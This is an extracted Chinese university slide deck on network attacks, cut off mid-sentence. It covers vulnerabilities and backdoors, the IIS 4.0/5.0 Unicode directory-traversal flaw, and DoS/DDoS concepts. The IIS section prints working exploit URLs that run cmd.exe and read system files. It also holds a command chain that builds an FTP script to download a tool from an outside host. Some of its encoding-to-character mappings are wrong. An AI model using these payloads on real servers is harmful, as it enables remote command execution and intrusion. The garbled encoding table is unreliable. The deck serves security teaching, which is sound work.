《工学网络攻击》课件.pptVIP

系统漏洞和后门 系统漏洞是程序中无意造成的缺陷，它形成了一个不被注意的通道。漏洞也指无意的配置错误，如使用默认服务器配置。 后门是一个在操作系统或程序中无证明文件的通道，通常是由软件开发人员故意放置在那里的，以便他们能够快速对产品进行支持。 IIS UNICODE 漏洞 NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。 IIS UNICODE 漏洞 对于IIS 5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如%c1%hh或者%c0%hh,它会首先将其解码变成:0xc10xhh， 然后尝试打开这个文件，Windows 系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果 0x00= %hh 0x40的话，采用的解码的格式与下面的格式类似：%c1%hh - (0xc1 - 0xc0) * 0x40 + 0xhh%c0%hh - (0xc0 - 0xc0) * 0x40 + 0xhh IIS UNICODE 漏洞 因此，利用这种编码，我们可以构造很多字符，例如:　　%c1%1c - (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘　　%c0%2f - (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘ ‘　　攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。 IIS UNICODE 漏洞 如果系统包含某个可执行目录，就可能执行任意系统命令。 下面的URL可能列出当前目录的内容： http://目标主机/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 利用这个漏洞查看系统文件内容也是可能的：http://目标主机/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini IIS漏洞 /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe /scripts/ccc.exe?/c+echo+open+getfile /scripts/ccc.exe?/c+type+getfile /scripts/ccc.exe?/c+echo+11+getfile /scripts/ccc.exe?/c+echo+administrator+getfile /scripts/ccc.exe?/c+echo+123456+getfile /scripts/ccc.exe?/c+echo+get+synful+getfile /scripts/ccc.exe?/c+echo+quit+getfile /scripts/ccc.exe?/c+ftp+-s:getfile 拒绝服务攻击 DoS（Denial of Service），其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。 拒绝服务攻击 带宽攻击指以极大的通信量冲击网络，使得所有可用网络资源都被消耗殆尽，最后导致合法的用户请求就无法通过。 连通性攻击指用大量的连接请求冲击计算机，使得所有可用的操作系统资源都被消耗殆尽，最终计算机无法再处理合法用户的请求 分布式拒绝服务攻击 (DDoS,Distributed Denial of Service) 指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DoS攻击，从而成倍地提高拒绝服务攻击的威力。 分布式拒绝服务攻击 DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的，当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高时，它的效果是明显的。 分布式拒绝服务攻击 随着计算机与网络技术的发展，计算机的处理能力迅速增长，内存大大增加，同时也出现了千兆级别的网络，这使得DoS攻击的困难程度加大了——目标对恶意攻击包的消化能力加强了不少，例如你的攻击软件每秒钟可以发送3,000个攻击包，但我的主机与网络带宽每秒钟可以处理10,000个攻击包，这样一来攻击就不会产生什么效果。 分布式拒绝服务攻击 高速广泛连接的网络给大家带来了方